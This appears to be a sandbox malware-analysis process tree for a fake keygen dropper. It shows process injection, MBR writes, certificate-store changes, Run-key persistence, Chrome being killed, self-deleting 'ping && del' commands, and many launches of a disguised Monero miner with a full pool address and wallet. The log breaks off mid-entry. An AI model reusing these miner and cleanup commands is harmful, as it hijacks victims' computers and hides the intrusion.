PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 1472 wrote to memory of 1676	1472	file.exe	cmd.exe
PID 1472 wrote to memory of 1676	1472	file.exe	cmd.exe
PID 1472 wrote to memory of 1676	1472	file.exe	cmd.exe
PID 1472 wrote to memory of 1676	1472	file.exe	cmd.exe
PID 1676 wrote to memory of 1276	1676	cmd.exe	PING.EXE
PID 1676 wrote to memory of 1276	1676	cmd.exe	PING.EXE
PID 1676 wrote to memory of 1276	1676	cmd.exe	PING.EXE
PID 1676 wrote to memory of 1276	1676	cmd.exe	PING.EXE
PID 1888 wrote to memory of 1172	1888	keygen-step-4.exe	Setup.exe
PID 1888 wrote to memory of 1172	1888	keygen-step-4.exe	Setup.exe
PID 1888 wrote to memory of 1172	1888	keygen-step-4.exe	Setup.exe
PID 1888 wrote to memory of 1172	1888	keygen-step-4.exe	Setup.exe
PID 1888 wrote to memory of 1172	1888	keygen-step-4.exe	Setup.exe
PID 1888 wrote to memory of 1172	1888	keygen-step-4.exe	Setup.exe
PID 1888 wrote to memory of 1172	1888	keygen-step-4.exe	Setup.exe
PID 1172 wrote to memory of 1048	1172	Setup.exe	msiexec.exe
PID 1172 wrote to memory of 1048	1172	Setup.exe	msiexec.exe
PID 1172 wrote to memory of 1048	1172	Setup.exe	msiexec.exe
PID 1172 wrote to memory of 1048	1172	Setup.exe	msiexec.exe
PID 1172 wrote to memory of 1048	1172	Setup.exe	msiexec.exe
PID 1172 wrote to memory of 1048	1172	Setup.exe	msiexec.exe
PID 1172 wrote to memory of 1048	1172	Setup.exe	msiexec.exe
PID 1456 wrote to memory of 912	1456	msiexec.exe	MsiExec.exe
PID 1456 wrote to memory of 912	1456	msiexec.exe	MsiExec.exe
PID 1456 wrote to memory of 912	1456	msiexec.exe	MsiExec.exe
PID 1456 wrote to memory of 912	1456	msiexec.exe	MsiExec.exe
PID 1456 wrote to memory of 912	1456	msiexec.exe	MsiExec.exe
PID 1456 wrote to memory of 912	1456	msiexec.exe	MsiExec.exe
PID 1456 wrote to memory of 912	1456	msiexec.exe	MsiExec.exe
PID 1172 wrote to memory of 1168	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1168	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1168	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1168	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1168	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1168	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1168	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1552	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1552	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1552	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1552	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1552	1172	Setup.exe	C0CA61A12E4C8B38.exe
PID 1172 wrote to memory of 1552	1172	Setup.exe	C0CA61A12E4C8B38.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1888

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472

C:\Users\Admin\AppData\Roaming\3260.tmp.exe
"C:\Users\Admin\AppData\Roaming\3260.tmp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:548

C:\Users\Admin\AppData\Roaming\3260.tmp.exe
"C:\Users\Admin\AppData\Roaming\3260.tmp.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:1276

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1172

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
3⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1048

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
PID:1168

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
PID:2740

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
PID:2476

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
PID:2348

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
4⤵
- Executes dropped EXE
PID:1068

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:2580

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:1552

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
4⤵
PID:1628

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
5⤵
- Kills process with taskkill
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
4⤵
PID:1644

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
5⤵
- Runs ping.exe
PID:2068

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
3⤵
PID:1600

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:804

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:536

C:\Users\Admin\AppData\Local\Temp\AE69COR1TA\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\AE69COR1TA\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1520

C:\Users\Admin\AppData\Local\Temp\AE69COR1TA\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\AE69COR1TA\multitimer.exe" 1 101
4⤵
- Executes dropped EXE
PID:2252

C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"
2⤵
- Executes dropped EXE
PID:1432

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:680

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:392

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
2⤵
- Executes dropped EXE
PID:2088

C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
2⤵
- Executes dropped EXE
PID:2108

C:\ProgramData\6521242.71
"C:\ProgramData\6521242.71"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2556

C:\ProgramData\2793302.30
"C:\ProgramData\2793302.30"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2520

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
4⤵
- Executes dropped EXE
PID:3064

C:\ProgramData\4960374.54
"C:\ProgramData\4960374.54"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2460

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:392

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2132

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1924

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:304

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2788

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2096

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2712

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2632

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2256

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1588

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2392

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2356

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1932

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1532

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1148

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1172

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1304

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:3032

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2992

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2896

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1764

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1508

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:804

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:756

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2852

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2428

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:892

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2932

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2136

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2124

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2088

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2672

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1924

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1740

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2252

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2188

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2172

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2424

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:1892

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2732

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
- Executes dropped EXE
PID:2500

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
PID:1588

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
